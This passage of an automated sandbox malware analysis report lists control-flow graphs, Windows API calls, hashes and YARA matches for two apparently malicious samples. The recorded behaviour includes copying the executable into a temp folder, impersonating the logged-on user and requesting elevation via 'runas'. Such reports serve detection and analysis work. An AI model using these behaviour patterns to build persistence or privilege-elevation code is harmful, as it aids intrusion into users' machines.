                                                                        control_flow_graph 280 7ffdc2eb0162-7ffdc2eb0ce5 284 7ffdc2eb0ce7-7ffdc2eb0cf6 280->284 285 7ffdc2eb0d40-7ffdc2eb0daa OpenServiceA 280->285 284->285 286 7ffdc2eb0cf8-7ffdc2eb0cfb 284->286 292 7ffdc2eb0dac 285->292 293 7ffdc2eb0db2-7ffdc2eb0de6 call 7ffdc2eb0e02 285->293 287 7ffdc2eb0d35-7ffdc2eb0d3d 286->287 288 7ffdc2eb0cfd-7ffdc2eb0d10 286->288 287->285 290 7ffdc2eb0d14-7ffdc2eb0d27 288->290 291 7ffdc2eb0d12 288->291 290->290 294 7ffdc2eb0d29-7ffdc2eb0d31 290->294 291->290 292->293 297 7ffdc2eb0de8 293->297 298 7ffdc2eb0ded-7ffdc2eb0e01 293->298 294->287 297->298
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: OpenService
                                                                        • String ID:
                                                                        • API String ID: 3098006287-0
                                                                        • Opcode ID: 50bbc8a79c4872553e6ca9fb3b471d999459bbe7e6995dc55c161e9fc7d9953b
                                                                        • Instruction ID: 45be1c63f25281d41af6d69ee9e2b7c5ab04d128957a55a83a8048180b99503d
                                                                        • Opcode Fuzzy Hash: 50bbc8a79c4872553e6ca9fb3b471d999459bbe7e6995dc55c161e9fc7d9953b
                                                                        • Instruction Fuzzy Hash: 97515030618A4D4FEB58EF28D8567B937E5FB59311F10412EE84EC3291DE75E8418B85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 34183e89955ef58204243979129bed3d8ddfa4bd4a7c1922377db50133a27393
                                                                        • Instruction ID: a7bb26fe808254a8673e2eb37f377588617d770f79465b87a876cf93dfff6555
                                                                        • Opcode Fuzzy Hash: 34183e89955ef58204243979129bed3d8ddfa4bd4a7c1922377db50133a27393
                                                                        • Instruction Fuzzy Hash: F251F331A0CA4D4FEB48EF68DC556B9B7E5FF99321F00017ED04DD32A2DEA968418791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ImpersonateLoggedUser
                                                                        • String ID:
                                                                        • API String ID: 2216092060-0
                                                                        • Opcode ID: 1c25384546163589a701c9bf984bbf82b795ce0cb72803502badab97a095a767
                                                                        • Instruction ID: 04f765fa9815880a778a17d894de1e40ddf9cc8bc143281d7538fa8b99eecfe3
                                                                        • Opcode Fuzzy Hash: 1c25384546163589a701c9bf984bbf82b795ce0cb72803502badab97a095a767
                                                                        • Instruction Fuzzy Hash: AD51F231A0CA494FEB48EF68CC556B9B7E5FF99321F00017ED04DD32A2DEB968058791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 353 7ffdc2eb0122-7ffdc2eb1115 356 7ffdc2eb111d-7ffdc2eb1152 FindCloseChangeNotification 353->356 357 7ffdc2eb115a-7ffdc2eb1181 356->357 358 7ffdc2eb1154 356->358 358->357
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 29f35905ea2ccf4cfebde689555aa7b334c838f3120d6312d5c2abd0bf35bc3b
                                                                        • Instruction ID: fa7ca37b244b351f3447020312105d72e287c2cd5c6a7e201da3594c0c216cc8
                                                                        • Opcode Fuzzy Hash: 29f35905ea2ccf4cfebde689555aa7b334c838f3120d6312d5c2abd0bf35bc3b
                                                                        • Instruction Fuzzy Hash: 56219030A08A0C9FDB58DF5CD845BF9BBE4FB69321F00422ED04AD3651DB75A856CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 359 7ffdc2eb10cc-7ffdc2eb1152 FindCloseChangeNotification 363 7ffdc2eb115a-7ffdc2eb1181 359->363 364 7ffdc2eb1154 359->364 364->363
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.393933198.00007FFDC2EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC2EB0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_7ffdc2eb0000_nika.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 0d741c969d74f6c0f64a54106d8c181f73904dc691372159207ecd2eb8df440e
                                                                        • Instruction ID: 89514e2fec566e758acc121034b8bd5fc183368698cb4b3eda858544288c6356
                                                                        • Opcode Fuzzy Hash: 0d741c969d74f6c0f64a54106d8c181f73904dc691372159207ecd2eb8df440e
                                                                        • Instruction Fuzzy Hash: AA218E31A08A0C9FDB58DF5CD845BF9BBE1FBA5321F00422ED049D3651DB75A856CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(010BE000,?,010BA9A0,010BAF26,?,010BE000,010BAF26,010BE000), ref: 010BA9C3
                                                                        • TerminateProcess.KERNEL32(00000000,?,010BA9A0,010BAF26,?,010BE000,010BAF26,010BE000), ref: 010BA9CA
                                                                        • ExitProcess.KERNEL32 ref: 010BA9DC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: c9b75e0769b6c8a80b1f15f7bb6bf3ddb2051c34648321213cfa371f678cd276
                                                                        • Instruction ID: 2cf2f334504393279e4b210428687e2eb9a4969f1172758ec6d7f092d9ecb3a5
                                                                        • Opcode Fuzzy Hash: c9b75e0769b6c8a80b1f15f7bb6bf3ddb2051c34648321213cfa371f678cd276
                                                                        • Instruction Fuzzy Hash: B4E0B635100108EFDB226B58D988AD93F69EB91342F154465F98587121CB3AED92EB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 010C2368: CreateFileW.KERNELBASE(00000000,00000000,?,010C2758,?,?,00000000,?,010C2758,00000000,0000000C), ref: 010C2385
                                                                        • GetLastError.KERNEL32 ref: 010C27C3
                                                                        • __dosmaperr.LIBCMT ref: 010C27CA
                                                                        • GetFileType.KERNELBASE(00000000), ref: 010C27D6
                                                                        • GetLastError.KERNEL32 ref: 010C27E0
                                                                        • __dosmaperr.LIBCMT ref: 010C27E9
                                                                        • CloseHandle.KERNEL32(00000000), ref: 010C2809
                                                                        • CloseHandle.KERNEL32(010BD4F0), ref: 010C2956
                                                                        • GetLastError.KERNEL32 ref: 010C2988
                                                                        • __dosmaperr.LIBCMT ref: 010C298F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                        • String ID: H
                                                                        • API String ID: 4237864984-2852464175
                                                                        • Opcode ID: 8efbaa2ac37c0c01fb94b676482dfa31b144755afb50435a52a3d3d40f0f41b0
                                                                        • Instruction ID: 3ba03ecd5d7be83dfea74e99c79144478858484f078bccd748442457319c1c37
                                                                        • Opcode Fuzzy Hash: 8efbaa2ac37c0c01fb94b676482dfa31b144755afb50435a52a3d3d40f0f41b0
                                                                        • Instruction Fuzzy Hash: E4A10332A041459FCF29DF68D891BEE3BF1AB0A724F18019DF891AB391CB359856CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 69 10a9c30-10a9cba call 10b5ac0 call 10a2ce0 GetTempPathA 74 10a9cc0-10a9cc5 69->74 74->74 75 10a9cc7-10a9d5b call 10b5e20 call 10b5f70 74->75 81 10a9d8c-10a9e02 call 10b5ac0 call 10a2ce0 call 10b62f0 call 10b5f70 75->81 82 10a9d5d-10a9d6c 75->82 104 10a9e33-10a9e5b 81->104 105 10a9e04-10a9e13 81->105 84 10a9d6e-10a9d7c 82->84 85 10a9d82-10a9d89 call 10b7684 82->85 84->85 87 10aa181 call 10bbcdc 84->87 85->81 93 10aa186 87->93 95 10aa18b-10aa1b8 call 10b59a0 * 2 CopyFileA call 10a5120 93->95 96 10aa186 call 10bbcdc 93->96 118 10aa1ba-10aa201 call 10b5a80 call 10b5ac0 call 10b5a80 call 10a3b10 95->118 119 10aa209-10aa20b call 10baa9f 95->119 96->95 109 10a9e8c-10a9edf GetModuleFileNameA 104->109 110 10a9e5d-10a9e6c 104->110 107 10a9e29-10a9e30 call 10b7684 105->107 108 10a9e15-10a9e23 105->108 107->104 108->93 108->107 111 10a9ee0-10a9ee5 109->111 114 10a9e6e-10a9e7c 110->114 115 10a9e82-10a9e89 call 10b7684 110->115 111->111 117 10a9ee7-10a9f38 call 10b5e20 111->117 114->93 114->115 115->109 129 10a9f3a-10a9f3d 117->129 130 10a9f94-10a9fb4 call 10bab6c 117->130 159 10aa206 118->159 125 10aa210-10aa215 call 10bbcdc 119->125 134 10a9f3f 129->134 135 10a9f51-10a9f54 129->135 143 10a9fdc-10aa000 call 10bab6c 130->143 144 10a9fb6-10a9fd9 call 10babfa call 10bae87 130->144 138 10a9f40-10a9f44 134->138 140 10a9f8a 135->140 141 10a9f56-10a9f5a 135->141 138->141 145 10a9f46-10a9f4f 138->145 142 10a9f8c-10a9f8e 140->142 147 10a9f5c-10a9f5f 141->147 148 10a9f83-10a9f88 141->148 142->130 150 10aa083-10aa08c 142->150 163 10aa002-10aa00b call 10babfa 143->163 164 10aa010-10aa06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 143->164 144->143 145->135 145->138 147->140 153 10a9f61-10a9f67 147->153 148->142 156 10aa08e-10aa099 150->156 157 10aa0bf-10aa0e3 150->157 153->148 154 10a9f69-10a9f6c 153->154 154->140 160 10a9f6e-10a9f74 154->160 165 10aa09b-10aa0a9 156->165 166 10aa0af-10aa0bc call 10b7684 156->166 161 10aa110-10aa134 157->161 162 10aa0e5-10aa0f0 157->162 159->119 160->148 168 10a9f76-10a9f79 160->168 172 10aa136-10aa145 161->172 173 10aa165-10aa180 call 10b7012 161->173 169 10aa0f2-10aa100 162->169 170 10aa106-10aa10d call 10b7684 162->170 163->119 163->150 186 10aa06f-10aa071 164->186 187 10aa077-10aa07d 164->187 165->125 165->166 166->157 168->140 177 10a9f7b-10a9f81 168->177 169->125 169->170 170->161 181 10aa15b-10aa162 call 10b7684 172->181 182 10aa147-10aa155 172->182 177->140 177->148 181->173 182->125 182->181 186->95 186->187 187->150
                                                                        APIs
                                                                        • GetTempPathA.KERNEL32(00000104,?), ref: 010A9C90
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: PathTemp
                                                                        • String ID:
                                                                        • API String ID: 2920410445-0
                                                                        • Opcode ID: 433dbaaaa8e97717dafd1e54a266c99e9684b167404111a18706c64957ae7313
                                                                        • Instruction ID: 56f5c4d07cb266e130d3efdc71e5b9e186c6332f48f42cae646e169fc0d0d7a1
                                                                        • Opcode Fuzzy Hash: 433dbaaaa8e97717dafd1e54a266c99e9684b167404111a18706c64957ae7313
                                                                        • Instruction Fuzzy Hash: 24A1C3B0A00258DBDF20DB64CC84BDDBBB9AB45304F9045D8D64967282DB755FC8CFA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 191 10a41d0-10a428a call 10b5ac0 call 10a2ce0 call 10b6070 call 10b5ac0 call 10a2ce0 call 10b5e20 call 10a3b10 206 10a428c-10a4298 191->206 207 10a42b4-10a42c5 Sleep 191->207 208 10a42aa-10a42b1 call 10b7684 206->208 209 10a429a-10a42a8 206->209 210 10a42ef-10a4308 call 10b7012 207->210 211 10a42c7-10a42d3 207->211 208->207 209->208 213 10a4309 call 10bbcdc 209->213 215 10a42e5-10a42ec call 10b7684 211->215 216 10a42d5-10a42e3 211->216 220 10a430e-10a435f call 10bbcdc call 10a3740 213->220 215->210 216->215 216->220 227 10a4363-10a4370 SetCurrentDirectoryA 220->227 228 10a4361 220->228 229 10a439e-10a4458 call 10b5ac0 call 10a2ce0 call 10b5ac0 call 10a2ce0 call 10b6070 call 10b5f70 call 10b5ac0 call 10a2ce0 call 10b5e20 call 10a3b10 227->229 230 10a4372-10a437e 227->230 228->227 262 10a445a-10a4466 229->262 263 10a4486-10a449e 229->263 232 10a4380-10a438e 230->232 233 10a4394-10a439b call 10b7684 230->233 232->233 236 10a4558 call 10bbcdc 232->236 233->229 240 10a455d call 10bbcdc 236->240 244 10a4562-10a4567 call 10bbcdc 240->244 264 10a4468-10a4476 262->264 265 10a447c-10a4483 call 10b7684 262->265 266 10a44cc-10a44e4 263->266 267 10a44a0-10a44ac 263->267 264->240 264->265 265->263 268 10a450e-10a4514 266->268 269 10a44e6-10a44f2 266->269 271 10a44ae-10a44bc 267->271 272 10a44c2-10a44c9 call 10b7684 267->272 276 10a453e-10a4557 call 10b7012 268->276 277 10a4516-10a4522 268->277 274 10a4504-10a450b call 10b7684 269->274 275 10a44f4-10a4502 269->275 271->240 271->272 272->266 274->268 275->240 275->274 281 10a4534-10a453b call 10b7684 277->281 282 10a4524-10a4532 277->282 281->276 282->244 282->281
                                                                        APIs
                                                                          • Part of subcall function 010A41D0: ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 010A3BA4
                                                                        • Sleep.KERNEL32(000003E8), ref: 010A42B9
                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,C73353B8), ref: 010A4364
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryExecuteShellSleep
                                                                        • String ID: runas
                                                                        • API String ID: 1553058795-4000483414
                                                                        • Opcode ID: 0745a717ef98bf9b8f258d0fe3a09248a853543d6c3ac6b5b2d4613fd475b8ba
                                                                        • Instruction ID: d03131edd6bbebc26632da673bbbbdf9b14d0f4c1a9f13f71df6721009056670
                                                                        • Opcode Fuzzy Hash: 0745a717ef98bf9b8f258d0fe3a09248a853543d6c3ac6b5b2d4613fd475b8ba
                                                                        • Instruction Fuzzy Hash: A7A17B71A10204ABDB08EBB8CD857DDBF72EF91314F98825CE481AB3C5DB759A4087D2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 288 10aa032-10aa034 289 10aa053-10aa06d GetFileAttributesA 288->289 290 10aa036-10aa04d CreateDirectoryA 288->290 291 10aa06f-10aa071 289->291 292 10aa077-10aa08c 289->292 290->289 291->292 293 10aa18b-10aa1b8 call 10b59a0 * 2 CopyFileA call 10a5120 291->293 296 10aa08e-10aa099 292->296 297 10aa0bf-10aa0e3 292->297 324 10aa1ba-10aa206 call 10b5a80 call 10b5ac0 call 10b5a80 call 10a3b10 293->324 325 10aa209-10aa20b call 10baa9f 293->325 301 10aa09b-10aa0a9 296->301 302 10aa0af-10aa0bc call 10b7684 296->302 299 10aa110-10aa134 297->299 300 10aa0e5-10aa0f0 297->300 306 10aa136-10aa145 299->306 307 10aa165-10aa180 call 10b7012 299->307 304 10aa0f2-10aa100 300->304 305 10aa106-10aa10d call 10b7684 300->305 301->302 308 10aa210-10aa215 call 10bbcdc 301->308 302->297 304->305 304->308 305->299 313 10aa15b-10aa162 call 10b7684 306->313 314 10aa147-10aa155 306->314 313->307 314->308 314->313 324->325 325->308
                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?), ref: 010AA04D
                                                                        • GetFileAttributesA.KERNELBASE(?,?,?,?,?), ref: 010AA068
                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 010AA1A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$AttributesCopyCreateDirectory
                                                                        • String ID:
                                                                        • API String ID: 210682061-0
                                                                        • Opcode ID: 3b58457c27eb7b4c03c395593d5bd38b90b94f93edb0ac625fd50a8fbd4bea93
                                                                        • Instruction ID: 9857aceee326c0f86705fc45e239476d08fc11ea0c6777adbd70f9899dc46d81
                                                                        • Opcode Fuzzy Hash: 3b58457c27eb7b4c03c395593d5bd38b90b94f93edb0ac625fd50a8fbd4bea93
                                                                        • Instruction Fuzzy Hash: A441E5B1A002188BDB24DB68CCC57DCBB75AF55314F9401DCE689A72C2DB356AC4CF6A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 335 10c0a55-10c0a6a GetEnvironmentStringsW 336 10c0a6c-10c0a8d call 10c0a1e call 10c0971 335->336 337 10c0ac5 335->337 336->337 345 10c0a8f-10c0a90 call 10bdb3c 336->345 339 10c0ac7-10c0ac9 337->339 341 10c0acb-10c0acc FreeEnvironmentStringsW 339->341 342 10c0ad2-10c0ad8 339->342 341->342 347 10c0a95-10c0a9a 345->347 348 10c0a9c-10c0ab2 call 10c0971 347->348 349 10c0aba 347->349 348->349 355 10c0ab4-10c0ab8 348->355 351 10c0abc-10c0ac3 call 10bd653 349->351 351->339 355->351
                                                                        APIs
                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 010C0A5E
                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 010C0ACC
                                                                          • Part of subcall function 010C0971: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,010C4B40,?,00000000,00000000), ref: 010C0A13
                                                                          • Part of subcall function 010BDB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,010B8272,?,?,?,?,?,010A20C3,?,?), ref: 010BDB6E
                                                                        • _free.LIBCMT ref: 010C0ABD
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
                                                                        • String ID:
                                                                        • API String ID: 2560199156-0
                                                                        • Opcode ID: 90ed20c70ff94a156ba73da14993e1a7e17243b4a37b3cd6a8f70cf0c5b17114
                                                                        • Instruction ID: 7604f76e4ec872325ed4ff149cd80aff511bc13d08eb50ff3a8ceefe010c1c11
                                                                        • Opcode Fuzzy Hash: 90ed20c70ff94a156ba73da14993e1a7e17243b4a37b3cd6a8f70cf0c5b17114
                                                                        • Instruction Fuzzy Hash: 2C01D87A601215FF732157BE1C88CBF7CADCAD2E54315022CBA44D2208FA558D41CAB0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 364 10a9d04-10a9d13 365 10a9d29-10a9d5b call 10b7684 364->365 366 10a9d15-10a9d23 364->366 373 10a9d8c-10a9e02 call 10b5ac0 call 10a2ce0 call 10b62f0 call 10b5f70 365->373 374 10a9d5d-10a9d6c 365->374 366->365 367 10aa181 call 10bbcdc 366->367 372 10aa186 367->372 375 10aa18b-10aa1b8 call 10b59a0 * 2 CopyFileA call 10a5120 372->375 376 10aa186 call 10bbcdc 372->376 400 10a9e33-10a9e5b 373->400 401 10a9e04-10a9e13 373->401 379 10a9d6e-10a9d7c 374->379 380 10a9d82-10a9d89 call 10b7684 374->380 394 10aa1ba-10aa206 call 10b5a80 call 10b5ac0 call 10b5a80 call 10a3b10 375->394 395 10aa209-10aa20b call 10baa9f 375->395 376->375 379->367 379->380 380->373 394->395 399 10aa210-10aa215 call 10bbcdc 395->399 407 10a9e8c-10a9edf GetModuleFileNameA 400->407 408 10a9e5d-10a9e6c 400->408 404 10a9e29-10a9e30 call 10b7684 401->404 405 10a9e15-10a9e23 401->405 404->400 405->372 405->404 410 10a9ee0-10a9ee5 407->410 413 10a9e6e-10a9e7c 408->413 414 10a9e82-10a9e89 call 10b7684 408->414 410->410 416 10a9ee7-10a9f38 call 10b5e20 410->416 413->372 413->414 414->407 424 10a9f3a-10a9f3d 416->424 425 10a9f94-10a9fb4 call 10bab6c 416->425 428 10a9f3f 424->428 429 10a9f51-10a9f54 424->429 435 10a9fdc-10aa000 call 10bab6c 425->435 436 10a9fb6-10a9fd9 call 10babfa call 10bae87 425->436 431 10a9f40-10a9f44 428->431 432 10a9f8a 429->432 433 10a9f56-10a9f5a 429->433 431->433 437 10a9f46-10a9f4f 431->437 434 10a9f8c-10a9f8e 432->434 438 10a9f5c-10a9f5f 433->438 439 10a9f83-10a9f88 433->439 434->425 441 10aa083-10aa08c 434->441 452 10aa002-10aa00b call 10babfa 435->452 453 10aa010-10aa06d GetFileAttributesA CreateDirectoryA GetFileAttributesA 435->453 436->435 437->429 437->431 438->432 443 10a9f61-10a9f67 438->443 439->434 446 10aa08e-10aa099 441->446 447 10aa0bf-10aa0e3 441->447 443->439 444 10a9f69-10a9f6c 443->444 444->432 449 10a9f6e-10a9f74 444->449 454 10aa09b-10aa0a9 446->454 455 10aa0af-10aa0bc call 10b7684 446->455 450 10aa110-10aa134 447->450 451 10aa0e5-10aa0f0 447->451 449->439 457 10a9f76-10a9f79 449->457 461 10aa136-10aa145 450->461 462 10aa165-10aa180 call 10b7012 450->462 458 10aa0f2-10aa100 451->458 459 10aa106-10aa10d call 10b7684 451->459 452->395 452->441 475 10aa06f-10aa071 453->475 476 10aa077-10aa07d 453->476 454->399 454->455 455->447 457->432 466 10a9f7b-10a9f81 457->466 458->399 458->459 459->450 470 10aa15b-10aa162 call 10b7684 461->470 471 10aa147-10aa155 461->471 466->432 466->439 470->462 471->399 471->470 475->375 475->476 476->441
                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 010A9EB5
                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 010AA1A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.395838344.00000000010A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 010A0000, based on PE: true
                                                                        • Associated: 0000000E.00000002.395826920.00000000010A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395940518.00000000010CE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395962835.00000000010D8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                        • Associated: 0000000E.00000002.395976121.00000000010DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_10a0000_xriv.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: File$CopyModuleName
                                                                        • String ID:
                                                                        • API String ID: 4108865673-0
                                                                        • Opcode ID: f42c5665bdce5a69169036ad91104892e6ccf6a12ebf6f7f10b76ae8ecf18cb5
                                                                        • Instruction ID: d5553405f3ae0c57f7162bcc2def22e8d1107454e286414178104c8d8a854638
                                                                        • Opcode Fuzzy Hash: f42c5665bdce5a69169036ad91104892e6ccf6a12ebf6f7f10b76ae8ecf18cb5
                                                                        • Instruction Fuzzy Hash: AAC127B1B001188BDB24DB68CC847DDBB75AB55318F8482D8D6C9A72C2DB359EC4CF66
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
